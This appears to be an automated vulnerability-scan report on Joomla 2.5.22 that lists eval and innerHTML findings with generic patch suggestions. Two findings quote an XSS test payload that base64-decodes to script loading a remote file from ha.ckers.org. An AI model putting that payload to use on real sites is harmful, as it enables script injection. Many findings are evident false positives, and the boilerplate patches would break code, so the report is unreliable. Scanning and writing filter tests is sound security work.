Back to Codebase

Vulnerability Analysis Report

Joomla CMS v2.5.22

Scan ID: SCAN-JOOMLA-CORE-rZDIC2 • Hash: 632e3cce

Severity Score
Critical
Total Findings
100
Engine Version
ECOMGUARD-HYBRID-AST-1.5
Scan Duration
0.426s

Vulnerability Details

L383

Dynamic Code Execution in simplexml.php

CWE-94
File Location: libraries/joomla/utilities/simplexml.php:383
Security Score:
98 / 100
Confirmed Issue

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. High Severity (Confirmed via full AST flow control tracing). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- eval('$this->' . $parent . '->addChild($name, $attrs, ' . $count . ');');
+ // Avoid dynamic function/code evaluation. Rewrite with native callbacks.
L386

Dynamic Code Execution in simplexml.php

CWE-94
File Location: libraries/joomla/utilities/simplexml.php:386
Security Score:
98 / 100
Confirmed Issue

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. High Severity (Confirmed via full AST flow control tracing). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- eval('$this->_stack[] = $name.\'[\'.(count($this->' . $parent . '->' . $name . ') - 1).\']\';');
+ // Avoid dynamic function/code evaluation. Rewrite with native callbacks.
L704

Dynamic Code Execution in JFilterInputTest.php

CWE-94
File Location: tests/unit/suite/libraries/joomla/filter/JFilterInputTest.php:704
Security Score:
98 / 100
Confirmed Issue

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. High Severity (Confirmed via full AST flow control tracing). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- "<img src='<img src='/onerror=eval(atob(/KGZ1bmN0aW9uKCl7dHJ5e3ZhciBkPWRvY3VtZW50LGI9ZC5ib2R5LHM9ZC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNldEF0dHJpYnV0ZSgnc3JjJywnaHR0cDovL2hhLmNrZXJzLm9yZy94c3MuanMnKTtiLmFwcGVuZENoaWxkKHMpO31jYXRjaChlKXt9fSkoKTs=/.source))//'/> ",
+ // Avoid dynamic function/code evaluation. Rewrite with native callbacks.
L469

Dynamic Code Execution in html.php

CWE-94
File Location: libraries/joomla/document/html/html.php:469
Security Score:
97 / 100
Confirmed Issue

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. High Severity (Confirmed via full AST flow control tracing). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- return eval($str);
+ // Avoid dynamic function/code evaluation. Rewrite with native callbacks.
L430

Dynamic Code Execution in simplexml.php

CWE-94
File Location: libraries/joomla/utilities/simplexml.php:430
Security Score:
97 / 100
Confirmed Issue

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. High Severity (Confirmed via full AST flow control tracing). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- eval('$this->' . $tag . '->_data .= $data;');
+ // Avoid dynamic function/code evaluation. Rewrite with native callbacks.
L1246

Dynamic Code Execution in JFilterInputTest.php

CWE-94
File Location: tests/unit/suite/libraries/joomla/filter/JFilterInputTest.php:1246
Security Score:
96 / 100
Confirmed Issue

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. High Severity (Confirmed via full AST flow control tracing). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- src='/onerror=eval(atob(/KGZ1bmN0aW9uKCl7dHJ5e3ZhciBkPWRvY3VtZW50LGI9ZC5ib2R5LHM9ZC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNldEF0dHJpYnV0ZSgnc3JjJywnaHR0cDovL2hhLmNrZXJzLm9yZy94c3MuanMnKTtiLmFwcGVuZENoaWxkKHMpO31jYXRjaChlKXt9fSkoKTs=/.source))//'/> ",
+ // Avoid dynamic function/code evaluation. Rewrite with native callbacks.
L91

Insecure DOM Manipulation (XSS) in codemirror-uncompressed.js

CWE-79
File Location: media/editors/codemirror/js/codemirror-uncompressed.js:91
Security Score:
75 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- scroller.innerHTML = "<div>" + firstNum + "</div>";
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L5

Insecure DOM Manipulation (XSS) in codemirror.js

CWE-79
File Location: media/editors/codemirror/js/codemirror.js:5
Security Score:
75 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- b.minHeight+"px":b.height;var f=this.textareaHack=s("textarea");e.appendChild(f);f.style.position="absolute";f.style.left="-10000px";f.style.width="10px";f.tabIndex=1E5;c.CodeMirror=this;if(b.domain&&H){this.html=G(b);c.src="javascript:(function(){document.open();"+(b.domain?'document.domain="'+b.domain+'";':"")+"document.write(window.frameElement.CodeMirror.html);document.close();})()"}else c.src="javascript:;";a.appendChild?a.appendChild(e):a(e);e.appendChild(c);if(b.lineNumbers)this.lineNumbers=
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L19

Insecure DOM Manipulation (XSS) in codemirror.js

CWE-79
File Location: media/editors/codemirror/js/codemirror.js:19
Security Score:
75 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- i.onclick=function(h){var l=k.options.onLineNumberClick;if(l){h=(h||window.event).target||(h||window.event).srcElement;var o=h==i?NaN:Number(h.innerHTML);isNaN(o)||l(o,h)}};var z=function(){};a();var J=setInterval(a,500);(this.options.textWrapping||this.options.styleNumbers?f:e)()},setDynamicHeight:function(){function a(){for(var q=0,i=f.lastChild,j;i&&e.isBR(i);){i.hackBR||q++;i=i.previousSibling}if(i){d=i.offsetHeight;j=i.offsetTop+(1+q)*d}else if(d)j=q*d;if(j){if(b.options.onDynamicHeightChange)j=
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L63

Insecure DOM Manipulation (XSS) in image.js

CWE-79
File Location: media/editors/tinymce/jscripts/tiny_mce/plugins/advimage/js/image.js:63
Security Score:
75 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- document.getElementById('srcbrowsercontainer').innerHTML = getBrowserHTML('srcbrowser','src','image','theme_advanced_image');
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L204

Insecure DOM Manipulation (XSS) in fullpage.js

CWE-79
File Location: media/editors/tinymce/jscripts/tiny_mce/plugins/fullpage/js/fullpage.js:204
Security Score:
75 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- document.getElementById('bgimage_pickcontainer').innerHTML = getBrowserHTML('bgimage_browser','bgimage','image','fullpage');
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L79

Insecure DOM Manipulation (XSS) in media.js

CWE-79
File Location: media/editors/tinymce/jscripts/tiny_mce/plugins/media/js/media.js:79
Security Score:
75 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- get('audio_altsource1_filebrowser').innerHTML = getBrowserHTML('audio_filebrowser_altsource1','audio_altsource1','media','media');
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L128

Insecure DOM Manipulation (XSS) in media.js

CWE-79
File Location: media/editors/tinymce/jscripts/tiny_mce/plugins/media/js/media.js:128
Security Score:
75 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- get('prev').innerHTML = this.editor.plugins.media.dataToHtml(this.data, true);
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L1

Insecure DOM Manipulation (XSS) in editor_plugin.js

CWE-79
File Location: media/editors/tinymce/jscripts/tiny_mce/plugins/spellchecker/editor_plugin.js:1
Security Score:
75 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- (function(){var a=tinymce.util.JSONRequest,c=tinymce.each,b=tinymce.DOM;tinymce.create("tinymce.plugins.SpellcheckerPlugin",{getInfo:function(){return{longname:"Spellchecker",author:"Moxiecode Systems AB",authorurl:"http://tinymce.moxiecode.com",infourl:"http://wiki.moxiecode.com/index.php/TinyMCE:Plugins/spellchecker",version:tinymce.majorVersion+"."+tinymce.minorVersion}},init:function(e,f){var g=this,d;g.url=f;g.editor=e;g.rpcUrl=e.getParam("spellchecker_rpc_url","{backend}");if(g.rpcUrl=="{backend}"){if(tinymce.isIE){return}g.hasSupport=true;e.onContextMenu.addToTop(function(h,i){if(g.active){return false}})}e.addCommand("mceSpellCheck",function(){if(g.rpcUrl=="{backend}"){g.editor.getBody().spellcheck=g.active=!g.active;return}if(!g.active){e.setProgressState(1);g._sendRPC("checkWords",[g.selectedLang,g._getWords()],function(h){if(h.length>0){g.active=1;g._markWords(h);e.setProgressState(0);e.nodeChanged()}else{e.setProgressState(0);if(e.getParam("spellchecker_report_no_misspellings",true)){e.windowManager.alert("spellchecker.no_mpell")}}})}else{g._done()}});if(e.settings.content_css!==false){e.contentCSS.push(f+"/css/content.css")}e.onClick.add(g._showMenu,g);e.onContextMenu.add(g._showMenu,g);e.onBeforeGetContent.add(function(){if(g.active){g._removeWords()}});e.onNodeChange.add(function(i,h){h.setActive("spellchecker",g.active)});e.onSetContent.add(function(){g._done()});e.onBeforeGetContent.add(function(){g._done()});e.onBeforeExecCommand.add(function(h,i){if(i=="mceFullScreen"){g._done()}});g.languages={};c(e.getParam("spellchecker_languages","+English=en,Danish=da,Dutch=nl,Finnish=fi,French=fr,German=de,Italian=it,Polish=pl,Portuguese=pt,Spanish=es,Swedish=sv","hash"),function(i,h){if(h.indexOf("+")===0){h=h.substring(1);g.selectedLang=i}g.languages[h]=i})},createControl:function(h,d){var f=this,g,e=f.editor;if(h=="spellchecker"){if(f.rpcUrl=="{backend}"){if(f.hasSupport){g=d.createButton(h,{title:"spellchecker.desc",cmd:"mceSpellCheck",scope:f})}return g}g=d.createSplitButton(h,{title:"spellchecker.desc",cmd:"mceSpellCheck",scope:f});g.onRenderMenu.add(function(j,i){i.add({title:"spellchecker.langs","class":"mceMenuItemTitle"}).setDisabled(1);c(f.languages,function(n,m){var p={icon:1},l;p.onclick=function(){if(n==f.selectedLang){return}l.setSelected(1);f.selectedItem.setSelected(0);f.selectedItem=l;f.selectedLang=n};p.title=m;l=i.add(p);l.setSelected(n==f.selectedLang);if(n==f.selectedLang){f.selectedItem=l}})});return g}},_walk:function(i,g){var h=this.editor.getDoc(),e;if(h.createTreeWalker){e=h.createTreeWalker(i,NodeFilter.SHOW_TEXT,null,false);while((i=e.nextNode())!=null){g.call(this,i)}}else{tinymce.walk(i,g,"childNodes")}},_getSeparators:function(){var e="",d,f=this.editor.getParam("spellchecker_word_separator_chars",'\\s!"#$%&()*+,-./:;<=>?@[]^_{|}§©«®±¶·¸»¼½¾¿×÷¤\u201d\u201c');for(d=0;d<f.length;d++){e+="\\"+f.charAt(d)}return e},_getWords:function(){var e=this.editor,g=[],d="",f={},h=[];this._walk(e.getBody(),function(i){if(i.nodeType==3){d+=i.nodeValue+" "}});if(e.getParam("spellchecker_word_pattern")){h=d.match("("+e.getParam("spellchecker_word_pattern")+")","gi")}else{d=d.replace(new RegExp("([0-9]|["+this._getSeparators()+"])","g")," ");d=tinymce.trim(d.replace(/(\s+)/g," "));h=d.split(" ")}c(h,function(i){if(!f[i]){g.push(i);f[i]=1}});return g},_removeWords:function(d){var e=this.editor,h=e.dom,g=e.selection,f=g.getRng(true);c(h.select("span").reverse(),function(i){if(i&&(h.hasClass(i,"mceItemHiddenSpellWord")||h.hasClass(i,"mceItemHidden"))){if(!d||h.decode(i.innerHTML)==d){h.remove(i,1)}}});g.setRng(f)},_markWords:function(l){var h=this.editor,g=h.dom,j=h.getDoc(),i=h.selection,d=i.getRng(true),e=[],k=l.join("|"),m=this._getSeparators(),f=new RegExp("(^|["+m+"])("+k+")(?=["+m+"]|$)","g");this._walk(h.getBody(),function(o){if(o.nodeType==3){e.push(o)}});c(e,function(t){var r,q,o,s,p=t.nodeValue;if(f.test(p)){p=g.encode(p);q=g.create("span",{"class":"mceItemHidden"});if(tinymce.isIE){p=p.replace(f,"$1<mcespell>$2</mcespell>");while((s=p.indexOf("<mcespell>"))!=-1){o=p.substring(0,s);if(o.length){r=j.createTextNode(g.decode(o));q.appendChild(r)}p=p.substring(s+10);s=p.indexOf("</mcespell>");o=p.substring(0,s);p=p.substring(s+11);q.appendChild(g.create("span",{"class":"mceItemHiddenSpellWord"},o))}if(p.length){r=j.createTextNode(g.decode(p));q.appendChild(r)}}else{q.innerHTML=p.replace(f,'$1<span class="mceItemHiddenSpellWord">$2</span>')}g.replace(q,t)}});i.setRng(d)},_showMenu:function(h,j){var i=this,h=i.editor,d=i._menu,l,k=h.dom,g=k.getViewPort(h.getWin()),f=j.target;j=0;if(!d){d=h.controlManager.createDropMenu("spellcheckermenu",{"class":"mceNoIcons"});i._menu=d}if(k.hasClass(f,"mceItemHiddenSpellWord")){d.removeAll();d.add({title:"spellchecker.wait","class":"mceMenuItemTitle"}).setDisabled(1);i._sendRPC("getSuggestions",[i.selectedLang,k.decode(f.innerHTML)],function(m){var e;d.removeAll();if(m.length>0){d.add({title:"spellchecker.sug","class":"mceMenuItemTitle"}).setDisabled(1);c(m,function(n){d.add({title:n,onclick:function(){k.replace(h.getDoc().createTextNode(n),f);i._checkDone()}})});d.addSeparator()}else{d.add({title:"spellchecker.no_sug","class":"mceMenuItemTitle"}).setDisabled(1)}if(h.getParam("show_ignore_words",true)){e=i.editor.getParam("spellchecker_enable_ignore_rpc","");d.add({title:"spellchecker.ignore_word",onclick:function(){var n=f.innerHTML;k.remove(f,1);i._checkDone();if(e){h.setProgressState(1);i._sendRPC("ignoreWord",[i.selectedLang,n],function(o){h.setProgressState(0)})}}});d.add({title:"spellchecker.ignore_words",onclick:function(){var n=f.innerHTML;i._removeWords(k.decode(n));i._checkDone();if(e){h.setProgressState(1);i._sendRPC("ignoreWords",[i.selectedLang,n],function(o){h.setProgressState(0)})}}})}if(i.editor.getParam("spellchecker_enable_learn_rpc")){d.add({title:"spellchecker.learn_word",onclick:function(){var n=f.innerHTML;k.remove(f,1);i._checkDone();h.setProgressState(1);i._sendRPC("learnWord",[i.selectedLang,n],function(o){h.setProgressState(0)})}})}d.update()});l=b.getPos(h.getContentAreaContainer());d.settings.offset_x=l.x;d.settings.offset_y=l.y;h.selection.select(f);l=k.getPos(f);d.showMenu(l.x,l.y+f.offsetHeight-g.y);return tinymce.dom.Event.cancel(j)}else{d.hideMenu()}},_checkDone:function(){var e=this,d=e.editor,g=d.dom,f;c(g.select("span"),function(h){if(h&&g.hasClass(h,"mceItemHiddenSpellWord")){f=true;return false}});if(!f){e._done()}},_done:function(){var d=this,e=d.active;if(d.active){d.active=0;d._removeWords();if(d._menu){d._menu.hideMenu()}if(e){d.editor.nodeChanged()}}},_sendRPC:function(e,g,d){var f=this;a.sendRPC({url:f.rpcUrl,method:e,params:g,success:d,error:function(i,h){f.editor.setProgressState(0);f.editor.windowManager.alert(i.errstr||("Error response: "+h.responseText))}})}});tinymce.PluginManager.add("spellchecker",tinymce.plugins.SpellcheckerPlugin)})();
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L67

Insecure DOM Manipulation (XSS) in props.js

CWE-79
File Location: media/editors/tinymce/jscripts/tiny_mce/plugins/style/js/props.js:67
Security Score:
75 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- document.getElementById("background_image_browser").innerHTML = h;
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L67

Insecure DOM Manipulation (XSS) in template.js

CWE-79
File Location: media/editors/tinymce/jscripts/tiny_mce/plugins/template/js/template.js:67
Security Score:
75 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- document.getElementById('tmpldesc').innerHTML = tsrc[x].description || '';
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L59

Insecure DOM Manipulation (XSS) in about.js

CWE-79
File Location: media/editors/tinymce/jscripts/tiny_mce/themes/advanced/js/about.js:59
Security Score:
75 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- tinyMCEPopup.dom.get('date').innerHTML = tinymce.releaseDate;
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L360

Insecure DOM Manipulation (XSS) in charmap.js

CWE-79
File Location: media/editors/tinymce/jscripts/tiny_mce/themes/advanced/js/charmap.js:360
Security Score:
75 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- elmB.innerHTML = '&amp;' + codeA;
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L15

Insecure DOM Manipulation (XSS) in image.js

CWE-79
File Location: media/editors/tinymce/jscripts/tiny_mce/themes/advanced/js/image.js:15
Security Score:
75 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- document.getElementById('srcbrowsercontainer').innerHTML = getBrowserHTML('srcbrowser','src','image','theme_advanced_image');
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L879

Insecure DOM Manipulation (XSS) in calendar-uncompressed.js

CWE-79
File Location: media/system/js/calendar-uncompressed.js:879
Security Score:
75 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- span.innerHTML = ":";
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L900

Insecure DOM Manipulation (XSS) in calendar-uncompressed.js

CWE-79
File Location: media/system/js/calendar-uncompressed.js:900
Security Score:
75 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- H.innerHTML = (hrs < 10) ? ("0" + hrs) : hrs;
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L1186

Insecure DOM Manipulation (XSS) in calendar-uncompressed.js

CWE-79
File Location: media/system/js/calendar-uncompressed.js:1186
Security Score:
75 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- this.title.innerHTML = Calendar._MN[month] + ", " + year;
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L2193

Insecure DOM Manipulation (XSS) in mootools-core-uncompressed.js

CWE-79
File Location: media/system/js/mootools-core-uncompressed.js:2193
Security Score:
75 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- testNode.innerHTML = '<select><option selected="selected">a</option></select>';
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L4035

Insecure DOM Manipulation (XSS) in mootools-core-uncompressed.js

CWE-79
File Location: media/system/js/mootools-core-uncompressed.js:4035
Security Score:
75 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- wrapper.innerHTML = [wrap[1], html, wrap[2]].flatten().join('');
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L175

Insecure DOM Manipulation (XSS) in mootools-core.js

CWE-79
File Location: media/system/js/mootools-core.js:175
Security Score:
75 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- try{c.innerHTML="foo</foo>";x=c.getElementsByTagName("*");q=(x&&!!x.length&&x[0].nodeName.charAt(0)=="/");}catch(C){}s.brokenStarGEBTN=u||q;try{c.innerHTML='<a name="'+v+'"></a><b id="'+v+'"></b>';
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L181

Insecure DOM Manipulation (XSS) in mootools-core.js

CWE-79
File Location: media/system/js/mootools-core.js:181
Security Score:
75 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- }catch(C){}}try{c.innerHTML='<form action="s"><input id="action"/></form>';t=(c.firstChild.getAttribute("action")!="s");}catch(C){}s.nativeMatchesSelector=A.matchesSelector||A.mozMatchesSelector||A.webkitMatchesSelector;
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L493

Insecure DOM Manipulation (XSS) in autocompleter.js

CWE-79
File Location: media/com_finder/js/autocompleter.js:493
Security Score:
74 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- var value = choice.innerHTML;
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L179

Insecure DOM Manipulation (XSS) in update.js

CWE-79
File Location: media/com_joomlaupdate/update.js:179
Security Score:
74 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- document.getElementById('extpercent').innerHTML = new Number(joomlaupdate_stat_percent).formatPercentage(1);
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L47

Insecure DOM Manipulation (XSS) in advlink.js

CWE-79
File Location: media/editors/tinymce/jscripts/tiny_mce/plugins/advlink/js/advlink.js:47
Security Score:
74 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- document.getElementById("anchorlistcontainer").innerHTML = html;
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L78

Insecure DOM Manipulation (XSS) in media.js

CWE-79
File Location: media/editors/tinymce/jscripts/tiny_mce/plugins/media/js/media.js:78
Security Score:
74 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- get('video_altsource2_filebrowser').innerHTML = getBrowserHTML('video_filebrowser_altsource2','video_altsource2','media','media');
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L6

Insecure DOM Manipulation (XSS) in row.js

CWE-79
File Location: media/editors/tinymce/jscripts/tiny_mce/plugins/table/js/row.js:6
Security Score:
74 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- document.getElementById('backgroundimagebrowsercontainer').innerHTML = getBrowserHTML('backgroundimagebrowser','backgroundimage','image','table');
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L336

Insecure DOM Manipulation (XSS) in mootools-core.js

CWE-79
File Location: media/system/js/mootools-core.js:336
Security Score:
74 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- while(u--){b.createElement(s[u]);}}t=null;var g=Function.attempt(function(){var e=document.createElement("table");e.innerHTML="<tr><td></td></tr>";return true;
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L519

Insecure DOM Manipulation (XSS) in mootree-uncompressed.js

CWE-79
File Location: media/system/js/mootree-uncompressed.js:519
Security Score:
74 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- this.div.icon.innerHTML = this.getImg( this.nodes.length ? ( this.open ? (this.openicon || this.icon || '_open') : (this.icon || '_closed') ) : ( this.icon || (this.control.mode == 'folders' ? '_closed' : '_doc') ) );
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L147

Insecure DOM Manipulation (XSS) in hide.js

CWE-79
File Location: templates/beez5/javascript/hide.js:147
Security Score:
74 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- grafik.innerHTML = rightopen;
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L207

Insecure DOM Manipulation (XSS) in hide.js

CWE-79
File Location: templates/beez_20/javascript/hide.js:207
Security Score:
74 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- grafik.innerHTML = rightopen;
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L8

Insecure DOM Manipulation (XSS) in image.js

CWE-79
File Location: media/editors/tinymce/jscripts/tiny_mce/plugins/advimage/js/image.js:8
Security Score:
73 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- document.write('<script language="javascript" type="text/javascript" src="' + tinyMCEPopup.editor.documentBaseURI.toAbsolute(url) + '"></script>');
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L203

Insecure DOM Manipulation (XSS) in fullpage.js

CWE-79
File Location: media/editors/tinymce/jscripts/tiny_mce/plugins/fullpage/js/fullpage.js:203
Security Score:
73 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- document.getElementById('stylesheet_browsercontainer').innerHTML = getBrowserHTML('stylesheetbrowser','stylesheet','file','fullpage');
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L1

Insecure DOM Manipulation (XSS) in editor_plugin.js

CWE-79
File Location: media/editors/tinymce/jscripts/tiny_mce/plugins/layer/editor_plugin.js:1
Security Score:
73 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- (function(){function a(b){do{if(b.className&&b.className.indexOf("mceItemLayer")!=-1){return b}}while(b=b.parentNode)}tinymce.create("tinymce.plugins.Layer",{init:function(b,c){var d=this;d.editor=b;b.addCommand("mceInsertLayer",d._insertLayer,d);b.addCommand("mceMoveForward",function(){d._move(1)});b.addCommand("mceMoveBackward",function(){d._move(-1)});b.addCommand("mceMakeAbsolute",function(){d._toggleAbsolute()});b.addButton("moveforward",{title:"layer.forward_desc",cmd:"mceMoveForward"});b.addButton("movebackward",{title:"layer.backward_desc",cmd:"mceMoveBackward"});b.addButton("absolute",{title:"layer.absolute_desc",cmd:"mceMakeAbsolute"});b.addButton("insertlayer",{title:"layer.insertlayer_desc",cmd:"mceInsertLayer"});b.onInit.add(function(){var e=b.dom;if(tinymce.isIE){b.getDoc().execCommand("2D-Position",false,true)}});b.onMouseUp.add(function(f,h){var g=a(h.target);if(g){f.dom.setAttrib(g,"data-mce-style","")}});b.onMouseDown.add(function(f,j){var h=j.target,i=f.getDoc(),g;if(tinymce.isGecko){if(a(h)){if(i.designMode!=="on"){i.designMode="on";h=i.body;g=h.parentNode;g.removeChild(h);g.appendChild(h)}}else{if(i.designMode=="on"){i.designMode="off"}}}});b.onNodeChange.add(d._nodeChange,d);b.onVisualAid.add(d._visualAid,d)},getInfo:function(){return{longname:"Layer",author:"Moxiecode Systems AB",authorurl:"http://tinymce.moxiecode.com",infourl:"http://wiki.moxiecode.com/index.php/TinyMCE:Plugins/layer",version:tinymce.majorVersion+"."+tinymce.minorVersion}},_nodeChange:function(c,b,f){var d,e;d=this._getParentLayer(f);e=c.dom.getParent(f,"DIV,P,IMG");if(!e){b.setDisabled("absolute",1);b.setDisabled("moveforward",1);b.setDisabled("movebackward",1)}else{b.setDisabled("absolute",0);b.setDisabled("moveforward",!d);b.setDisabled("movebackward",!d);b.setActive("absolute",d&&d.style.position.toLowerCase()=="absolute")}},_visualAid:function(b,d,c){var f=b.dom;tinymce.each(f.select("div,p",d),function(g){if(/^(absolute|relative|fixed)$/i.test(g.style.position)){if(c){f.addClass(g,"mceItemVisualAid")}else{f.removeClass(g,"mceItemVisualAid")}f.addClass(g,"mceItemLayer")}})},_move:function(j){var 